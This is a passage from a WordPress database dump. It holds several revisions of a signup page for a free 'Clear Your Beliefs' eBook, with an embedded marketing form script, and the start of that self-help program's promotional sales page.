un-subscribe anytime.]</small><center>Get Lion''s free eBook, <em>Clear Your Beliefs!</em></center><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/ec4d25c4ea7e88210ce7b8c897c925d5"></script></p>\r\n<p><ul><li>You’ll get an email to confirm your address, then you''ll get immediate access to the downloadable book.</li>\r\n<li>You will also receive Lion’s periodic newsletter about beliefs, belief-change, and transformation.</li></ul>\r\n</p>\r\n<p>If we can ever provide you with answers to your questions, guidance on your path, or good, deep conversation about these topics, please contact us through <a href="http://www.clearyourbeliefs.com/support" target="_blank">www.ClearYourBeliefs.com/support.</a> We look forward to staying connected.</p></div>\r\n</center> [/su_box]\r\n\r\n\r\n\r\n<p style="margin-left: 30px; margin-right: 30px;"><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png"><img class="alignleft size-medium wp-image-1893" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook-201x300.png" alt="Clear-your-beliefs-ebook" width="150" height="225" /></a>We would be delighted to send you a free copy of Lion’s multimedia eBook, <em>“Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life"</em>.</p>\r\nThis multimedia book describes the science and the art of the <em>Clear Your Beliefs</em> process. It offers an explanation for why you do what you do, and why it’s so difficult to change your habitual patterns of thought and behavior. It’s a beautifully produced primer on beliefs.</p>\r\n\r\nYou’ll get an email to confirm your address, then you''ll get immediate access to the downloadable book.\r\n<p style="margin-left: 30px; margin-right: 30px;">You will also receive Lion’s periodic newsletter about beliefs, belief-change, and transformation.</p>\r\n<p style="margin-left: 30px; margin-right: 30px;">If we can ever provide you with answers to your questions, guidance on your path, or good, deep conversation about these topics, please contact us through <a href="http://www.clearyourbeliefs.com/support" target="_blank">www.ClearYourBeliefs.com/support.</a> We look forward to staying connected.</p>\r\n<p style="margin-left: 30px; margin-right: 30px;">[Note: Your contact information will never be shared, and you can un-subscribe anytime.]</p>\r\n', 'ebook', '', 'inherit', 'open', 'open', '', '1720-revision-v1', '', '', '2015-05-29 12:44:20', '2015-05-29 17:44:20', '', 1720, 'http://clearyourbeliefs.com/1720-revision-v1/', 0, 'revision', '', 0),
(2205, 2, '2015-05-29 12:43:07', '2015-05-29 17:43:07', '<center>Get Lion''s free eBook, <em>Clear Your Beliefs!</em></center>\r\n\r\n[su_box title="Free ebook!" box_color="#1a2d8c" radius="8"]\r\n<div style="margin-left: -15px; margin-bottom: 0px;"><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png"><img class="alignleft size-medium wp-image-1893" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook-201x300.png" alt="Clear-your-beliefs-ebook" width="150" height="225" /></a>We would be delighted to send you a free copy of Lion’s multimedia eBook, <em>“Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life"</em>.</p>\r\n<p>This multimedia book describes the science and the art of the <em>Clear Your Beliefs</em> process. It offers an explanation for why you do what you do, and why it’s so difficult to change your habitual patterns of thought and behavior. It’s a beautifully produced primer on beliefs.</p><small>[Note: Your contact information will never be shared, and you can un-subscribe anytime.]</small><center>Get Lion''s free eBook, <em>Clear Your Beliefs!</em></center><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/ec4d25c4ea7e88210ce7b8c897c925d5"></script>\r\n<p><ul><li>You’ll get an email to confirm your address, then you''ll get immediate access to the downloadable book.</li>\r\n<li>You will also receive Lion’s periodic newsletter about beliefs, belief-change, and transformation.</li></ul>\r\n</p>\r\n<p>If we can ever provide you with answers to your questions, guidance on your path, or good, deep conversation about these topics, please contact us through <a href="http://www.clearyourbeliefs.com/support" target="_blank">www.ClearYourBeliefs.com/support.</a> We look forward to staying connected.</p></div>\r\n</center> [/su_box]\r\n\r\n\r\n\r\n<p style="margin-left: 30px; margin-right: 30px;"><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png"><img class="alignleft size-medium wp-image-1893" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook-201x300.png" alt="Clear-your-beliefs-ebook" width="150" height="225" /></a>We would be delighted to send you a free copy of Lion’s multimedia eBook, <em>“Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life"</em>.</p>\r\nThis multimedia book describes the science and the art of the <em>Clear Your Beliefs</em> process. It offers an explanation for why you do what you do, and why it’s so difficult to change your habitual patterns of thought and behavior. It’s a beautifully produced primer on beliefs.</p>\r\n\r\nYou’ll get an email to confirm your address, then you''ll get immediate access to the downloadable book.\r\n<p style="margin-left: 30px; margin-right: 30px;">You will also receive Lion’s periodic newsletter about beliefs, belief-change, and transformation.</p>\r\n<p style="margin-left: 30px; margin-right: 30px;">If we can ever provide you with answers to your questions, guidance on your path, or good, deep conversation about these topics, please contact us through <a href="http://www.clearyourbeliefs.com/support" target="_blank">www.ClearYourBeliefs.com/support.</a> We look forward to staying connected.</p>\r\n<p style="margin-left: 30px; margin-right: 30px;">[Note: Your contact information will never be shared, and you can un-subscribe anytime.]</p>\r\n', 'ebook', '', 'inherit', 'open', 'open', '', '1720-revision-v1', '', '', '2015-05-29 12:43:07', '2015-05-29 17:43:07', '', 1720, 'http://clearyourbeliefs.com/1720-revision-v1/', 0, 'revision', '', 0),
(2204, 2, '2015-05-29 12:42:24', '2015-05-29 17:42:24', '<center>Get Lion''s free eBook, <em>Clear Your Beliefs!</em></center>\r\n\r\n[su_box title="Free ebook!" box_color="#1a2d8c" radius="8"]\r\n<div style="margin-left: -15px; margin-bottom: 0px;"><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png"><img class="alignleft size-medium wp-image-1893" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook-201x300.png" alt="Clear-your-beliefs-ebook" width="150" height="225" /></a>We would be delighted to send you a free copy of Lion’s multimedia eBook, <em>“Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life"</em>.</p>\r\n<p>This multimedia book describes the science and the art of the <em>Clear Your Beliefs</em> process. It offers an explanation for why you do what you do, and why it’s so difficult to change your habitual patterns of thought and behavior. It’s a beautifully produced primer on beliefs.</p><small>[Note: Your contact information will never be shared, and you can un-subscribe anytime.]</small><center>Get Lion''s free eBook, <em>Clear Your Beliefs!</em></center><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/ec4d25c4ea7e88210ce7b8c897c925d5"></script>\r\n<p style="margin-left: 30px; margin-right: 30px;"><ul><li>You’ll get an email to confirm your address, then you''ll get immediate access to the downloadable book.</li>\r\n<p style="margin-left: 30px; margin-right: 30px;">	<li>You will also receive Lion’s periodic newsletter about beliefs, belief-change, and transformation.</li></ul>\r\n</p>\r\n<p>If we can ever provide you with answers to your questions, guidance on your path, or good, deep conversation about these topics, please contact us through <a href="http://www.clearyourbeliefs.com/support" target="_blank">www.ClearYourBeliefs.com/support.</a> We look forward to staying connected.</p></div>\r\n</center> [/su_box]\r\n\r\n\r\n\r\n<p style="margin-left: 30px; margin-right: 30px;"><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png"><img class="alignleft size-medium wp-image-1893" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook-201x300.png" alt="Clear-your-beliefs-ebook" width="150" height="225" /></a>We would be delighted to send you a free copy of Lion’s multimedia eBook, <em>“Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life"</em>.</p>\r\nThis multimedia book describes the science and the art of the <em>Clear Your Beliefs</em> process. It offers an explanation for why you do what you do, and why it’s so difficult to change your habitual patterns of thought and behavior. It’s a beautifully produced primer on beliefs.</p>\r\n\r\nYou’ll get an email to confirm your address, then you''ll get immediate access to the downloadable book.\r\n<p style="margin-left: 30px; margin-right: 30px;">You will also receive Lion’s periodic newsletter about beliefs, belief-change, and transformation.</p>\r\n<p style="margin-left: 30px; margin-right: 30px;">If we can ever provide you with answers to your questions, guidance on your path, or good, deep conversation about these topics, please contact us through <a href="http://www.clearyourbeliefs.com/support" target="_blank">www.ClearYourBeliefs.com/support.</a> We look forward to staying connected.</p>\r\n<p style="margin-left: 30px; margin-right: 30px;">[Note: Your contact information will never be shared, and you can un-subscribe anytime.]</p>\r\n', 'ebook', '', 'inherit', 'open', 'open', '', '1720-revision-v1', '', '', '2015-05-29 12:42:24', '2015-05-29 17:42:24', '', 1720, 'http://clearyourbeliefs.com/1720-revision-v1/', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(2209, 2, '2015-05-29 12:48:46', '2015-05-29 17:48:46', '<center>Get Lion''s free eBook, <em>Clear Your Beliefs!</em></center>\r\n\r\n[su_box title="Free ebook!" box_color="#1a2d8c" radius="8"]\r\n<div style="margin-left: -15px; margin-bottom: 0px;"><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png"><img class="alignleft size-medium wp-image-1893" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook-201x300.png" alt="Clear-your-beliefs-ebook" width="150" height="225" /></a>We would be delighted to send you a free copy of Lion’s multimedia eBook, <em>“Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life"</em>.</p>\r\n<p>This multimedia book describes the science and the art of the <em>Clear Your Beliefs</em> process. It offers an explanation for why you do what you do, and why it’s so difficult to change your habitual patterns of thought and behavior. It’s a beautifully produced primer on beliefs.</p><h2><center>Get Lion''s free eBook, <em>Clear Your Beliefs!</em></h2></center><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/ec4d25c4ea7e88210ce7b8c897c925d5"></script></p>\r\n\r\n\r\nYou’ll get an email to confirm your address, then you''ll get immediate access to the downloadable book.\r\n\r\n<p style="margin-left: 30px; margin-right: 30px;">==>> You will also receive Lion’s periodic newsletter about beliefs, belief-change, and transformation.</p>\r\n<p style="margin-left: 30px; margin-right: 30px;">==>> If we can ever provide you with answers to your questions, guidance on your path, or good, deep conversation about these topics, please contact us through <a href="http://www.clearyourbeliefs.com/support" target="_blank">www.ClearYourBeliefs.com/support.</a> We look forward to staying connected.</p>\r\n<p style="margin-left: 30px; margin-right: 30px;">[Note: Your contact information will never be shared, and you can un-subscribe anytime.]</p>\r\n\r\n\r\n</center> [/su_box]\r\n', 'ebook', '', 'inherit', 'open', 'open', '', '1720-revision-v1', '', '', '2015-05-29 12:48:46', '2015-05-29 17:48:46', '', 1720, 'http://clearyourbeliefs.com/1720-revision-v1/', 0, 'revision', '', 0),
(2211, 2, '2015-05-29 12:49:46', '2015-05-29 17:49:46', '[su_box title="Free ebook!" box_color="#1a2d8c" radius="8"]\r\n<div style="margin-left: -15px; margin-bottom: 0px;"><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png"><img class="alignleft size-medium wp-image-1893" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook-201x300.png" alt="Clear-your-beliefs-ebook" width="150" height="225" /></a>We would be delighted to send you a free copy of Lion’s multimedia eBook, <em>“Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life"</em>.</p>\r\n<p>This multimedia book describes the science and the art of the <em>Clear Your Beliefs</em> process. It offers an explanation for why you do what you do, and why it’s so difficult to change your habitual patterns of thought and behavior. It’s a beautifully produced primer on beliefs.</p><h2><center>Get Lion''s free eBook, <em>Clear Your Beliefs!</em></h2></center><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/ec4d25c4ea7e88210ce7b8c897c925d5"></script></p>\r\n\r\n\r\n<strong>You’ll get an email to confirm your address, then you''ll get immediate access to the downloadable book.</strong>\r\n\r\n<p style="margin-left: 30px; margin-right: 30px;"><strong>==>></strong> You will also receive Lion’s periodic newsletter about beliefs, belief-change, and transformation.</p>\r\n<p style="margin-left: 30px; margin-right: 30px;"><strong>==>></strong> If we can ever provide you with answers to your questions, guidance on your path, or good, deep conversation about these topics, please contact us through <a href="http://www.clearyourbeliefs.com/support" target="_blank">www.ClearYourBeliefs.com/support.</a> We look forward to staying connected.</p>\r\n<p style="margin-left: 30px; margin-right: 30px;">[Note: Your contact information will never be shared, and you can un-subscribe anytime.]</p>\r\n\r\n\r\n</center> [/su_box]\r\n', 'ebook', '', 'inherit', 'open', 'open', '', '1720-revision-v1', '', '', '2015-05-29 12:49:46', '2015-05-29 17:49:46', '', 1720, 'http://clearyourbeliefs.com/1720-revision-v1/', 0, 'revision', '', 0),
(2210, 2, '2015-05-29 12:49:19', '2015-05-29 17:49:19', '<center>Get Lion''s free eBook, <em>Clear Your Beliefs!</em></center>\r\n\r\n[su_box title="Free ebook!" box_color="#1a2d8c" radius="8"]\r\n<div style="margin-left: -15px; margin-bottom: 0px;"><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png"><img class="alignleft size-medium wp-image-1893" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook-201x300.png" alt="Clear-your-beliefs-ebook" width="150" height="225" /></a>We would be delighted to send you a free copy of Lion’s multimedia eBook, <em>“Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life"</em>.</p>\r\n<p>This multimedia book describes the science and the art of the <em>Clear Your Beliefs</em> process. It offers an explanation for why you do what you do, and why it’s so difficult to change your habitual patterns of thought and behavior. It’s a beautifully produced primer on beliefs.</p><h2><center>Get Lion''s free eBook, <em>Clear Your Beliefs!</em></h2></center><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/ec4d25c4ea7e88210ce7b8c897c925d5"></script></p>\r\n\r\n\r\n<strong>You’ll get an email to confirm your address, then you''ll get immediate access to the downloadable book.</strong>\r\n\r\n<p style="margin-left: 30px; margin-right: 30px;"><strong>==>></strong> You will also receive Lion’s periodic newsletter about beliefs, belief-change, and transformation.</p>\r\n<p style="margin-left: 30px; margin-right: 30px;"><strong>==>></strong> If we can ever provide you with answers to your questions, guidance on your path, or good, deep conversation about these topics, please contact us through <a href="http://www.clearyourbeliefs.com/support" target="_blank">www.ClearYourBeliefs.com/support.</a> We look forward to staying connected.</p>\r\n<p style="margin-left: 30px; margin-right: 30px;">[Note: Your contact information will never be shared, and you can un-subscribe anytime.]</p>\r\n\r\n\r\n</center> [/su_box]\r\n', 'ebook', '', 'inherit', 'open', 'open', '', '1720-revision-v1', '', '', '2015-05-29 12:49:19', '2015-05-29 17:49:19', '', 1720, 'http://clearyourbeliefs.com/1720-revision-v1/', 0, 'revision', '', 0),
(2212, 2, '2015-05-29 12:51:09', '2015-05-29 17:51:09', '[su_box title="Free ebook!" box_color="#1a2d8c" radius="8"]\r\n<h2><center>Get Lion''s free eBook, <em>Clear Your Beliefs!</em></h2></center>\r\n<div style="margin-left: -15px; margin-bottom: 0px;"><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png"><img class="alignleft size-medium wp-image-1893" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook-201x300.png" alt="Clear-your-beliefs-ebook" width="150" height="225" /></a>We would be delighted to send you a free copy of Lion’s multimedia eBook, <em>“Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life"</em>.</p>\r\n<p>This multimedia book describes the science and the art of the <em>Clear Your Beliefs</em> process. It offers an explanation for why you do what you do, and why it’s so difficult to change your habitual patterns of thought and behavior. It’s a beautifully produced primer on beliefs.</p><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/ec4d25c4ea7e88210ce7b8c897c925d5"></script></p>\r\n\r\n\r\n<strong>You’ll get an email to confirm your address, then you''ll get immediate access to the downloadable book.</strong>\r\n\r\n<p style="margin-left: 30px; margin-right: 30px;"><strong>==>></strong> You will also receive Lion’s periodic newsletter about beliefs, belief-change, and transformation.</p>\r\n<p style="margin-left: 30px; margin-right: 30px;"><strong>==>></strong> If we can ever provide you with answers to your questions, guidance on your path, or good, deep conversation about these topics, please contact us through <a href="http://www.clearyourbeliefs.com/support" target="_blank">www.ClearYourBeliefs.com/support.</a> We look forward to staying connected.</p>\r\n<p style="margin-left: 30px; margin-right: 30px;">[Note: Your contact information will never be shared, and you can un-subscribe anytime.]</p>\r\n\r\n\r\n</center> [/su_box]\r\n', 'ebook', '', 'inherit', 'open', 'open', '', '1720-revision-v1', '', '', '2015-05-29 12:51:09', '2015-05-29 17:51:09', '', 1720, 'http://clearyourbeliefs.com/1720-revision-v1/', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(2213, 2, '2015-05-29 13:01:45', '2015-05-29 18:01:45', '&nbsp;\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<strong>Your "limitations" are created by your beliefs.\nLearn to change your beliefs, and your limitations will disappear.\nYour possibilities will then become unlimited.</strong>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<p>&nbsp;</p>\n\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n\nRelease pain and hurts from the past\nOpen to deeper, more profound love\nRecognize your true spiritual nature\nBecome more calm and less reactive\nRediscover the source of your personal power\n\nClear whatever stops you from taking action\nOpen yourself to new possibilities of success\nEliminate blocks and barriers easily\nDiscover your true purpose\nExpress your true magnificence\n\n<h2>How and Why It Works So Well</h2>\n\nBeliefs are the major cause of unhappiness, upsets, and limitations.\nThe <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.\nThe process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.\nYou''re in charge – you decide what you want to believe, and how far you want to go.\nThe program guides you, gently, step-by-step, through the entire process of deleting beliefs.\nUnlike other methods, the changes you make are permanent – your old beliefs don''t come back.\n\n<p>&nbsp;</p>\n<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift.jpg"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></a> You''re seeking a better life, and you''ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You''ve had some breakthrough experiences and epiphanies. You''ve made progress toward your goals.</p>\n<p>Yet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.</p>\n<p>&nbsp;</p>\n<h1>What If You Could Permanently Delete Old Habits And Patterns – So They <em>Didn''t</em> Come Back?</h1>\n<p>Hundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their "fixes" tend to wear off over time. After taking their program, you''re revved up, transformed, and ready to go.</p>\n<p><strong>Two weeks later,</strong> you''re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You''re still not taking consistent actions to reach your goals or change your life.\n&nbsp;</p>\n<h1><a class="big button blue" href="http://clearyourbeliefs.com/program/#package">Okay, I''m convinced!Take me to the program description,tell me about all the cool bonuses I''ll get,and how much it costs...</a></h1>\n<p>&nbsp;</p>\n<h1><a class="big button blue" href="http://clearyourbeliefs.com/ebook/" target="_blank">Register for FREE Ebook</a></h1>\n<p>&nbsp;</p>\n<h1>Why Does This Happen?</h1>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2.jpg"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /></a>Have you heard the myth, <em>"It takes 30 days to change a habit?"</em> <strong>It''s not true.</strong> Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes much more time and practice.</p>\n<p>Neuroscientists call the brain''s ability to change over time "neuroplasticity."</p>\n<p>It can take months – or <em>years</em> – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong></p>\n<p>&nbsp;</p>\n<h1>To Make Real Change, You Have To Get To The Root of Things</h1>\n<p>The best doctors seek the <em>source</em> the <em>source</em> of the dis-ease. They don''t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don''t solve the <em>cause</em> of the problem – where the illness is being generated.<img class=" wp-image-324 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" alt="weedjpg-300x199" width="184" height="122" /></p>\n<p>If you don''t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?</p>\n<p>&nbsp;</p>\n<h1>Beliefs Are The Foundation Of Your Experience</h1>\n<p>Your psychological, emotional, and spiritual dis-ease are caused primarily by your <em>beliefs.</em> We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate <em>through us</em>, and they are at the root of all the habits and patterns in our life. But we''re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong></p>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg"><img class=" wp-image-320 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" alt="construction-300x224" width="158" height="118" /></a>Beliefs can be seen as the literal<em> foundation</em> of consciousness, upon which our thoughts, feelings, and attitudes are built.</p>\n<p><strong>We literally create our reality with our beliefs.</strong></p>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg"><img class=" wp-image-321 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" alt="dilap" width="157" height="114" /></a>If you build a house on a shaky ground, it doesn''t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won''t be able to achieve permanent success.</p>\n<p>&nbsp;</p>\n<h1>Upgrade Your Human Operating System</h1>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open.jpg"><img class=" wp-image-328 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open-254x300.jpg" alt="brain-open" width="123" height="146" /></a> Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – <em>like managing your life</em>.</p>\n<p>Negative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. <strong>Do you ever have thoughts like these?</strong></p>\n\n<strong><em>I''m not enough.</em></strong>\n<strong><em>I can''t do it.</em></strong>\n<strong><em>I''m not worthy.</em></strong>\n<strong><strong><em>I''ll never be like them.</em></strong></strong>\n<strong><em>I''m all alone.</em></strong>\n\n<strong><em>I need to do more (or better) to be accepted.</em></strong>\n<strong><em>There''s something wrong with me.</em></strong>\n<strong><em>I''m fundamentally flawed.</em></strong>\n<strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong>\n<strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong>\n\n<p>These beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.</p>\n<p>At the core of every bad feeling you have about yourself, and every limitation you have, there''s a belief operating in the background, like an annoying little machine that you can''t turn off.</p>\n<p><strong>Here''s the good news:</strong> <strong>Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</strong></p>\n<p>&nbsp;</p>\n<h1>The Garden Of Your Mind</h1>\n<p style="text-align: left"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px;margin-right: 20px" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.</p>\n<p>The same thing is true in your subconscious mind:</p>\n<p><strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong></p>\n<p><strong>It''s that simple.</strong></p>\n<h1>Beliefs Reside In The Subconscious Mind</h1>\n\n<p style="text-align: left">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\n<p style="text-align: left"><img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\n<p>When you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong></p>\n\n<p>A shift at the core of the psyche expands out like a pebble''s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong></p>\n\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\n\n<p><strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.</p>\n\n<p><em><strong>How you view others </strong></em>is colored by your beliefs about them.</p>\n\n<p><img class=" wp-image-322 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" /><strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.</p>\n\n<p>Change the lens of your beliefs, and you''ll change <strong>both</strong> your perception <strong>and</strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong></p>\n\n<p><strong> It''s that simple.</strong></p>\n\n<p>&nbsp;</p>\n<h1>Why Beliefs Are Difficult To Change</h1>\n\n<p>Many people agree that, <em>"Your beliefs create your reality," </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There''s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.</p>\n\n<p><strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.</p>\n\n<p>Your parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn''t know any better. it''s exactly what <em>their parents</em> did to<em> them</em>.</p>\n\n<p>You formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."</p>\n\n<p>&nbsp;</p>\n<h1>Why We React The Way We Do</h1>\n\n<p>When you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:</p>\n\n<p><img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" /></p>\n\n<p>\n</p>\nWhy did I say that?\nWhat''s wrong with me?\nWhy didn''t I follow through?\nWhy did I react that way?\nWhat the hell just happened?\n\n<p><em></p>\n\n<p>"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.</p>\n\n<p>These programs are like mousetraps in your mind''s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.</p>\n\n<p><strong>You can change these reactive patterns – if you''re willing to clean out your basement.</strong></p>\n\n<p>&nbsp;</p>\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\n\n<p><strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?</p>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. </p>\n\n<p><strong>Here''s why:</strong></p>\n\n<strong>Affirmations</strong> are new beliefs you want to install. You can say them all day long, but they don''t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.\n<strong>That Belief Isn''t True.</strong>  Many methods help you recognize that an old belief isn''t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.\n<strong>Tap Your Problem Away. </strong> Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love 